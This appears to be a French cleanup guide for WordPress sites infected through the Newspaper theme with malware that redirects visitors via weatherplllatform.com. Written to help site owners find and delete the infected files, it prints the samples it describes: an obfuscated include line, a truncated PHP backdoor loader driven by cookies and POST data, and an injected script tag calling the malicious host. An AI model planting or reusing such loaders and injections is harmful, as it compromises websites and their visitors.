Hack WordPress : Theme Newspaper / weatherplllatform.com malware

Si vous avez un site wordpress qui redirige automatiquement vers des publicités en boucle lorsque vous rendez vous sur votre site.

Veuillez vérifier les points suivants ;

Ouvrez le fichier index.php

/*7b9b6*/

@include ("\057var\057www\057vho\163ts/\154esc\157ckt\141ils\144ale\170and\162e.c\157m/h\164tpd\157cs/\167p-i\156clu\144es/\142loc\153s/p\157st-\145xce\162pt/\05686c\063188\064.ic\157");

/*7b9b6*/

Si vous y voyez ce type de code alors, votre wordpress a été hacké. Ce type de code peut se trouver dans plusieurs fichiers.

Tous les fichiers index.php de votre site (voir les sous dossiers)

Le fichier wp-config.php

Vous avez vraisemblablement un fichier login.php qui a été complétement vérolé. Vous devez le supprimer.

radio.php

Vous aurez ce fichier infecté

function xk1($eg2){$ad3 = "i.cH2h35mpts*(fo70nk6Lva#u@I" .";81 e)4<g9bEy" ."/rl?d'" ."-F" ."_x" ;$ck5='';foreach($eg2 as $fb4){$ck5.=$ad3[$fb4];}return $ck5;}$wj6 = Array();$wj6[] = xk1(Array(7,7,17,45,37,16,23,16,47,4,29,30,6,47,34,17,16,38,47,29,32,30,2,47,4,37,17,37,2,14,20,45,45,38,2,7));$wj6[] = xk1(Array(44,9,5,9,31,26,25,18,43,0,18,19,13,49,49,48,27,21,39,49,49,33,28,31));$wj6[] = xk1(Array(1,8,15,45,25,43,32));$wj6[] = xk1(Array(3,12));$wj6[] = xk1(Array(1,41));$wj6[] = xk1(Array(24));$wj6[] = xk1(Array(35));$wj6[] = xk1(Array(14,0,43,32,49,9,25,10,49,2,15,18,10,32,18,10,11));$wj6[] = xk1(Array(23,42,42,23,40,49,8,32,42,36,32));$wj6[] = xk1(Array(11,10,42,49,42,32,9,32,23,10));$wj6[] = xk1(Array(32,50,9,43,15,45,32));$wj6[] = xk1(Array(11,25,38,11,10,42));$wj6[] = xk1(Array(25,18,43,0,18,19));$wj6[] = xk1(Array(11,10,42,43,32,18));$wj6[] = xk1(Array(9,23,2,19));$wj6[] = xk1(Array(8,45,7));foreach ($wj6[8]($_COOKIE, $_POST) as $wv14 => $sl11){function dx8($wj6, $wv14, $od10){return $wj6[11]($wj6[9]($wv14 . $wj6[0], ($od10 / $wj6[13]($wv14)) + 1), 0, $od10);}function jy7($wj6, $qk12){return @$wj6[14]($wj6[3], $qk12);}function kz9($wj6, $qk12){if (isset($qk12[2])) {$wo13 = $wj6[4] . $wj6[15]($wj6[0]) . $wj6[2];@$wj6[7]($wo13, $wj6[6] . $wj6[1] . $qk12[1]($qk12[2]));@include($wo13);@$wj6[12]($wo13);exit();}}$sl11 = jy7($wj6, $sl1

Voici le type de code qu’il contiendra.

Vous trouverez ce fichier dans cet emplacement wp-admin/css/colors/blue/ ou une autre couleur.

Supprimez le !

wp-stopstore.php

<?php  $hpghqk = 'L1oFl/_5s-E2(nz@9vkg\'4Nxht3Uyi; ecfda6u<jr.0I7bm)p?'; $efsdqlj = array(); $efsdqlj[] = $hpghqk[21] . $hpghqk[32] . $hpghqk[34] . $hpghqk[37] . $hpgh

Fichier avec ce type de code également

Supprimez le également. Il se trouve à la racine de votre wordpress.

wp-clearlineee

Suprimmer le fichier que vous devez avoir à la racine.

Allez également à l’endroit où se trouve les extensions /wp-content/plugins/

et supprimer le dossier wp-clearlineee

L’extension insère dans votre page le javascript suivant

<script src=’https://news.weatherplllatform.com/counter.js‘ async=’true’ type=’text/javascript’></script>

Le javascript crée les redirections de vos visiteurs. Il vérifie d’abord si vous êtes l’administrateur du site. Si vous l’êtes vous n’êtes pas redirigé, oui le malware est malin. On veut pas que vous le détectez. Par contre si vous êtes un visiteur lambda alors vous êtes redirigez.

Au final

Votre wordpress n’est plus infecté.

Nous vous recommandons de mettre à jour votre thème ou de le changer. Le thème NewsMag ou Newspaper ont souvent des failles.

Si toutefois vous avez toujours un problème de wordpress piraté. N’hésitez pas à nous consulter.